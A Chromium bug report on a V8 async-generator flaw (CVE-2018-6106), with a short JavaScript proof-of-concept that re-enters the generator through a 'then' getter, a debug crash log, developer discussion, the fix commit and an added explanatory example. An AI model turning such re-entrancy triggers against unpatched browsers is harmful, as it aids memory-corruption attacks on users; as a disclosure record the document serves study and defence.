
Issue metadata

Status: Fixed
Closed: Feb 5
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac , Fuchsia
Pri: 1
Type: Bug-Security


Security: V8: AwaitedPromise update bug

Reported by, Jan 25

Issue description

Here's a snippet of AsyncGeneratorReturn:

  Node* const context = Parameter(Descriptor::kContext);
  Node* const outer_promise = LoadPromiseFromAsyncGeneratorRequest(req);
  Node* const promise =
      Await(context, generator, value, outer_promise, AwaitContext::kLength,
            init_closure_context, var_on_resolve.value(), var_on_reject.value(),

  CSA_SLOW_ASSERT(this, IsGeneratorNotSuspendedForAwait(generator));
  StoreObjectField(generator, JSAsyncGeneratorObject::kAwaitedPromiseOffset,

The Await method calls ResolveNativePromise, which calls InternalResolvePromise, which can invoke user JavaScript code through a "then" getter. If the AwaitedPromise is replaced by the user script, the AwaitedPromise will be immediately overwritten after the call to Await; this may lead the generator to an incorrect state.

async function* asyncGenerator() {}

let gen = asyncGenerator();
gen.return({
    get then() {
        delete this.then;
        // Re-enter the generator while the first Await is still resolving
        // (reconstructed from the description; the original getter body is cut off).
        gen.return();
    }
});

Log in debug mode:
abort: CSA_ASSERT failed: IsNotUndefined(request) [../../src/builtins/]

==== JS stack trace =========================================

Security context: 0x2b29083a3a71 <JSObject>#0#
    2: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#)

==== Details ================================================

[2]: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#) {
// optimized frame
--------- s o u r c e   c o d e ---------
<No Source>
==== Key         ============================================

 #0# 0x2b29083a3a71: 0x2b29083a3a71 <JSObject>
 #1# 0x19b7b0603721: 0x19b7b0603721 <JSGlobal Object>
 #2# 0x19b7b060d139: 0x19b7b060d139 <Object map = 0x189055388c91>

Received signal 4 ILL_ILLOPN 7fb143ae2781

==== C stack trace ===============================

[end of stack trace]
Illegal instruction

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
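The resolve path the report describes, as an added example (not code from the report or from V8): resolving a promise with a plain object reads its `then` property synchronously, so a `then` getter is a hook that runs user JavaScript inside the engine before the resolving caller regains control. The second function replays the report's scenario on an engine that carries the fix (any current V8/Node.js): `.return()` on a suspended-at-start async generator with a thenable whose getter re-enters the generator; both requests are queued and settle in order instead of reaching the failed assertion. The function names and event-log strings are this example's own.

```javascript
// Added example, not part of the V8 bug report. Shows the hook the report
// relies on: promise resolution reads `then` synchronously, so a `then` getter
// on the resolution value runs user code inside the engine's resolve path.

function thenGetterIsSynchronous() {
  const events = [];
  const thenable = {
    get then() {
      events.push("then getter");
      delete this.then;   // behave like a plain value afterwards
      return undefined;   // no callable -> the promise fulfills with the object
    },
  };
  events.push("before resolve");
  const promise = new Promise((resolve) => resolve(thenable));
  events.push("after resolve");  // the getter has already run by this point
  return { events, thenable, promise };
}

// The report's scenario on a fixed engine: .return() on an async generator
// that has not started, passing a thenable whose `then` getter re-enters the
// generator with a second .return() while the first value is still being
// awaited. With the fix both requests are queued and settle in order.
function reenterSuspendedAsyncGenerator() {
  const events = [];
  async function* asyncGenerator() {}
  const gen = asyncGenerator();
  let second;
  const thenable = {
    get then() {
      events.push("then getter inside first return()");
      delete this.then;
      second = gen.return("second");  // re-entrant request on the same generator
      return undefined;
    },
  };
  const first = gen.return(thenable);
  events.push("first return() call finished");
  // `second` is assigned inside the getter, which must run before `first`
  // can settle, so it is defined by the time this callback fires.
  return first.then((r1) =>
    second.then((r2) => ({ events, thenable, results: [r1, r2] })));
}

// Stand-alone run: print the event order and the two iterator results.
thenGetterIsSynchronous().events.forEach((e) => console.log("promise:", e));
reenterSuspendedAsyncGenerator().then(({ events, results }) => {
  events.forEach((e) => console.log("generator:", e));
  console.log("results:", results);
});
```

Run it with `node`: the "then getter" lines print before the "after resolve" / "call finished" lines, which is the window the report's PoC uses to replace the awaited promise. On a fixed engine the two results are `{ value: <thenable>, done: true }` and `{ value: 'second', done: true }`.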

Comment 1 by ClusterFuzz, Jan 25

ClusterFuzz is analyzing your testcase. Developers can follow the progress at
Status: Assigned (was: Unconfirmed)

I'm guessing the iOS-only label was accidental?

neis: Can you please take a look?

Labels: -OS-iOS

Caitlin, please have a look.

It seems that not having an explicit "awaiting-return" state is problematic. From what I can tell, the write to kAwaitedPromiseOffset in AsyncGeneratorReturn happens too late, because the Await can trigger a reentrance of this code.

If you have cycles to take this, you should. I can assist in small ways, but won’t be back to my normal v8 schedule for some time.

Status: Started (was: Assigned)

neis: Can you please help assign a Security_Impact label? Does this affect stable channel?

Labels: Security_Impact-Stable

Comment 15 by, Jan 30

Labels: M-64

Comment 16 by, Jan 31

The following revision refers to this bug:

commit 9c4c717b5d1765ff31f773df416115d3dd08de60
Author: Georg Neis <>
Date: Wed Jan 31 07:43:28 2018

Fix bug in async generators.

Async generators didn't correctly handle the situation where one calls
.return on a suspended-at-start async generator and passes a
promise-like object whose awaiting causes a new request to the

Bug:  chromium:805729 
Change-Id: I4da13ab5bd97f8c2a2c5373242a2d5e2ab0f7f10
Reviewed-by: Caitlin Potter <>
Reviewed-by: Jaroslav Sevcik <>
Commit-Queue: Georg Neis <>
Cr-Commit-Position: refs/heads/master@{#50974}

Status: Fixed (was: Started)

Comment 18 by, Feb 8

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -M-64 M-66
Labels: OS-Android OS-Chrome OS-Fuchsia OS-Linux OS-Mac OS-Windows
Labels: Release-0-M66
Labels: CVE-2018-6106
Labels: CVE_description-missing

Comment 24 by, May 14

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
